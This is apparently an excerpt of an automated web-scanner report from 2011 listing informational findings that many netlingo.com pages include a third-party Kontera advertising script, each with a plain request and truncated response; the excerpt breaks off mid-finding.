<script type='text/javascript' src='http://kona.kontera.com/javascript/lib/KonaLibInline.js'>
</script>
...[SNIP]...

21.1134. http://www.netlingo.com/archive.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.netlingo.com
Path:   /archive.php

Issue detail

The response dynamically includes the following script from another domain:
  • http://kona.kontera.com/javascript/lib/KonaLibInline.js

Request

GET /archive.php HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:51:42 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 40587

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
</script>
<script type='text/javascript' src='http://kona.kontera.com/javascript/lib/KonaLibInline.js'>
</script>
...[SNIP]...

21.1135. http://www.netlingo.com/by-category/index.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.netlingo.com
Path:   /by-category/index.php

Issue detail

The response dynamically includes the following script from another domain:
  • http://kona.kontera.com/javascript/lib/KonaLibInline.js

Request

GET /by-category/index.php HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:49:58 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 41095

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
</script>
<script type='text/javascript' src='http://kona.kontera.com/javascript/lib/KonaLibInline.js'>
</script>
...[SNIP]...

21.1136. http://www.netlingo.com/category/acronyms.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.netlingo.com
Path:   /category/acronyms.php

Issue detail

The response dynamically includes the following script from another domain:
  • http://kona.kontera.com/javascript/lib/KonaLibInline.js

Request

GET /category/acronyms.php HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:50:02 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 163340

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
</script>
<script type='text/javascript' src='http://kona.kontera.com/javascript/lib/KonaLibInline.js'>
</script>
...[SNIP]...

21.1137. http://www.netlingo.com/category/business.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.netlingo.com
Path:   /category/business.php

Issue detail

The response dynamically includes the following script from another domain:
  • http://kona.kontera.com/javascript/lib/KonaLibInline.js

Request

GET /category/business.php HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:50:06 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 83555

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
</script>
<script type='text/javascript' src='http://kona.kontera.com/javascript/lib/KonaLibInline.js'>
</script>
...[SNIP]...

21.1138. http://www.netlingo.com/category/hardware.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.netlingo.com
Path:   /category/hardware.php

Issue detail

The response dynamically includes the following script from another domain:
  • http://kona.kontera.com/javascript/lib/KonaLibInline.js

Request

GET /category/hardware.php HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:50:18 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 46206

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
</script>
<script type='text/javascript' src='http://kona.kontera.com/javascript/lib/KonaLibInline.js'>
</script>
...[SNIP]...

21.1139. http://www.netlingo.com/category/jargon.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.netlingo.com
Path:   /category/jargon.php

Issue detail

The response dynamically includes the following script from another domain:
  • http://kona.kontera.com/javascript/lib/KonaLibInline.js

Request

GET /category/jargon.php HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:50:10 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 129619

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
</script>
<script type='text/javascript' src='http://kona.kontera.com/javascript/lib/KonaLibInline.js'>
</script>
...[SNIP]...

21.1140. http://www.netlingo.com/category/marketing.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.netlingo.com
Path:   /category/marketing.php

Issue detail

The response dynamically includes the following script from another domain:
  • http://kona.kontera.com/javascript/lib/KonaLibInline.js

Request

GET /category/marketing.php HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:50:18 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 46870

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
</script>
<script type='text/javascript' src='http://kona.kontera.com/javascript/lib/KonaLibInline.js'>
</script>
...[SNIP]...

21.1141. http://www.netlingo.com/category/net-organization.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.netlingo.com
Path:   /category/net-organization.php

Issue detail

The response dynamically includes the following script from another domain:
  • http://kona.kontera.com/javascript/lib/KonaLibInline.js

Request

GET /category/net-organization.php HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:50:29 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 50980

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
</script>
<script type='text/javascript' src='http://kona.kontera.com/javascript/lib/KonaLibInline.js'>
</script>
...[SNIP]...

21.1142. http://www.netlingo.com/category/programming.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.netlingo.com
Path:   /category/programming.php

Issue detail

The response dynamically includes the following script from another domain:
  • http://kona.kontera.com/javascript/lib/KonaLibInline.js

Request

GET /category/programming.php HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:50:24 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 40843

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
</script>
<script type='text/javascript' src='http://kona.kontera.com/javascript/lib/KonaLibInline.js'>
</script>
...[SNIP]...

21.1143. http://www.netlingo.com/category/software.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.netlingo.com
Path:   /category/software.php

Issue detail

The response dynamically includes the following script from another domain:
  • http://kona.kontera.com/javascript/lib/KonaLibInline.js

Request

GET /category/software.php HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:50:22 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 45055

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
</script>
<script type='text/javascript' src='http://kona.kontera.com/javascript/lib/KonaLibInline.js'>
</script>
...[SNIP]...

21.1144. http://www.netlingo.com/category/technical.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.netlingo.com
Path:   /category/technical.php

Issue detail

The response dynamically includes the following script from another domain:
  • http://kona.kontera.com/javascript/lib/KonaLibInline.js

Request

GET /category/technical.php HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:50:54 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 75558

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
</script>
<script type='text/javascript' src='http://kona.kontera.com/javascript/lib/KonaLibInline.js'>
</script>
...[SNIP]...

21.1145. http://www.netlingo.com/category/technology.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.netlingo.com
Path:   /category/technology.php

Issue detail

The response dynamically includes the following script from another domain:
  • http://kona.kontera.com/javascript/lib/KonaLibInline.js

Request

GET /category/technology.php HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:50:42 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 60392

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
</script>
<script type='text/javascript' src='http://kona.kontera.com/javascript/lib/KonaLibInline.js'>
</script>
...[SNIP]...

21.1146. http://www.netlingo.com/contact/contact-us.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.netlingo.com
Path:   /contact/contact-us.php

Issue detail

The response dynamically includes the following script from another domain:
  • http://kona.kontera.com/javascript/lib/KonaLibInline.js

Request

GET /contact/contact-us.php HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 05:00:17 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 34733

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
</script>
<script type='text/javascript' src='http://kona.kontera.com/javascript/lib/KonaLibInline.js'>
</script>
...[SNIP]...

21.1147. http://www.netlingo.com/contact/faq.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.netlingo.com
Path:   /contact/faq.php

Issue detail

The response dynamically includes the following script from another domain:
  • http://kona.kontera.com/javascript/lib/KonaLibInline.js

Request

GET /contact/faq.php HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 05:00:18 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 50982

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
</script>
<script type='text/javascript' src='http://kona.kontera.com/javascript/lib/KonaLibInline.js'>
</script>
...[SNIP]...

21.1148. http://www.netlingo.com/contact/linktonetlingo.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.netlingo.com
Path:   /contact/linktonetlingo.php

Issue detail

The response dynamically includes the following script from another domain:
  • http://kona.kontera.com/javascript/lib/KonaLibInline.js

Request

GET /contact/linktonetlingo.php HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 05:00:25 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 37791

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
</script>
<script type='text/javascript' src='http://kona.kontera.com/javascript/lib/KonaLibInline.js'>
</script>
...[SNIP]...

21.1149. http://www.netlingo.com/country.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.netlingo.com
Path:   /country.php

Issue detail

The response dynamically includes the following script from another domain:
  • http://kona.kontera.com/javascript/lib/KonaLibInline.js

Request

GET /country.php HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:53:24 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 36558

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
</script>
<script type='text/javascript' src='http://kona.kontera.com/javascript/lib/KonaLibInline.js'>
</script>
...[SNIP]...

21.1150. http://www.netlingo.com/hello/welcome.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.netlingo.com
Path:   /hello/welcome.php

Issue detail

The response dynamically includes the following script from another domain:
  • http://kona.kontera.com/javascript/lib/KonaLibInline.js

Request

GET /hello/welcome.php HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:54:03 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 42722

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
</script>
<script type='text/javascript' src='http://kona.kontera.com/javascript/lib/KonaLibInline.js'>
</script>
...[SNIP]...

21.1151. http://www.netlingo.com/index.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.netlingo.com
Path:   /index.php

Issue detail

The response dynamically includes the following script from another domain:
  • http://kona.kontera.com/javascript/lib/KonaLibInline.js

Request

GET /index.php HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:47:33 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 45979

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
</script>
<script type='text/javascript' src='http://kona.kontera.com/javascript/lib/KonaLibInline.js'>
</script>
...[SNIP]...

21.1152. http://www.netlingo.com/iphone/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.netlingo.com
Path:   /iphone/

Issue detail

The response dynamically includes the following script from another domain:
  • http://kona.kontera.com/javascript/lib/KonaLibInline.js

Request

GET /iphone/ HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:54:02 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 32376


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html><!--Programming, Authoring, and Design by Erin Jansen and Vincent James, NetLingo.com is copyrighted and trademarked -->
<head>
<
...[SNIP]...
</script>
<script type='text/javascript' src='http://kona.kontera.com/javascript/lib/KonaLibInline.js'>
</script>
...[SNIP]...

21.1153. http://www.netlingo.com/iphone/index.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.netlingo.com
Path:   /iphone/index.php

Issue detail

The response dynamically includes the following script from another domain:
  • http://kona.kontera.com/javascript/lib/KonaLibInline.js

Request

GET /iphone/index.php HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:53:58 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 32385


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html><!--Programming, Authoring, and Design by Erin Jansen and Vincent James, NetLingo.com is copyrighted and trademarked -->
<head>
<
...[SNIP]...
</script>
<script type='text/javascript' src='http://kona.kontera.com/javascript/lib/KonaLibInline.js'>
</script>
...[SNIP]...

21.1154. http://www.netlingo.com/legal/copyright.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.netlingo.com
Path:   /legal/copyright.php

Issue detail

The response dynamically includes the following script from another domain:
  • http://kona.kontera.com/javascript/lib/KonaLibInline.js

Request

GET /legal/copyright.php HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 05:00:16 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 55189

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
</script>
<script type='text/javascript' src='http://kona.kontera.com/javascript/lib/KonaLibInline.js'>
</script>
...[SNIP]...

21.1155. http://www.netlingo.com/login.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.netlingo.com
Path:   /login.php

Issue detail

The response dynamically includes the following script from another domain:
  • http://kona.kontera.com/javascript/lib/KonaLibInline.js

Request

GET /login.php HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:46:02 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Set-Cookie: PHPSESSID=p2kggg0b9m3bnq9c57hhsvlcl0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 33956

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
</script>
<script type='text/javascript' src='http://kona.kontera.com/javascript/lib/KonaLibInline.js'>
</script>
...[SNIP]...

21.1156. http://www.netlingo.com/more/adsizes.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.netlingo.com
Path:   /more/adsizes.php

Issue detail

The response dynamically includes the following script from another domain:
  • http://kona.kontera.com/javascript/lib/KonaLibInline.js

Request

GET /more/adsizes.php HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:53:19 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 29473


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html><!--Programming, Authoring, and Design by Erin Jansen and Vincent James, NetLingo.com is copyrighted and trademarked -->
<head>
...[SNIP]...
</script>
<script type='text/javascript' src='http://kona.kontera.com/javascript/lib/KonaLibInline.js'>
</script>
...[SNIP]...

21.1157. http://www.netlingo.com/press/about-netlingo.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.netlingo.com
Path:   /press/about-netlingo.php

Issue detail

The response dynamically includes the following script from another domain:
  • http://kona.kontera.com/javascript/lib/KonaLibInline.js

Request

GET /press/about-netlingo.php HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:56:14 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 74633

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
</script>
<script type='text/javascript' src='http://kona.kontera.com/javascript/lib/KonaLibInline.js'>
</script>
...[SNIP]...

21.1158. http://www.netlingo.com/press/all-press-clippings.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.netlingo.com
Path:   /press/all-press-clippings.php

Issue detail

The response dynamically includes the following script from another domain:
  • http://kona.kontera.com/javascript/lib/KonaLibInline.js

Request

GET /press/all-press-clippings.php HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:55:37 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 82341

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
</script>
<script type='text/javascript' src='http://kona.kontera.com/javascript/lib/KonaLibInline.js'>
</script>
...[SNIP]...

21.1159. http://www.netlingo.com/press/awards.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.netlingo.com
Path:   /press/awards.php

Issue detail

The response dynamically includes the following script from another domain:
  • http://kona.kontera.com/javascript/lib/KonaLibInline.js

Request

GET /press/awards.php HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:56:13 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 33462

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
</script>
<script type='text/javascript' src='http://kona.kontera.com/javascript/lib/KonaLibInline.js'>
</script>
...[SNIP]...

21.1160. http://www.netlingo.com/press/index.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.netlingo.com
Path:   /press/index.php

Issue detail

The response dynamically includes the following script from another domain:
  • http://kona.kontera.com/javascript/lib/KonaLibInline.js

Request

GET /press/index.php HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:55:24 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 33830

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
</script>
<script type='text/javascript' src='http://kona.kontera.com/javascript/lib/KonaLibInline.js'>
</script>
...[SNIP]...

21.1161. http://www.netlingo.com/press/media.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.netlingo.com
Path:   /press/media.php

Issue detail

The response dynamically includes the following script from another domain:
  • http://kona.kontera.com/javascript/lib/KonaLibInline.js

Request

GET /press/media.php HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:55:01 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 69711

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
</script>
<script type='text/javascript' src='http://kona.kontera.com/javascript/lib/KonaLibInline.js'>
</script>
...[SNIP]...

21.1162. http://www.netlingo.com/press/meet-erin.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.netlingo.com
Path:   /press/meet-erin.php

Issue detail

The response dynamically includes the following script from another domain:
  • http://kona.kontera.com/javascript/lib/KonaLibInline.js

Request

GET /press/meet-erin.php HTTP/1.1
Host: www.netlingo.com
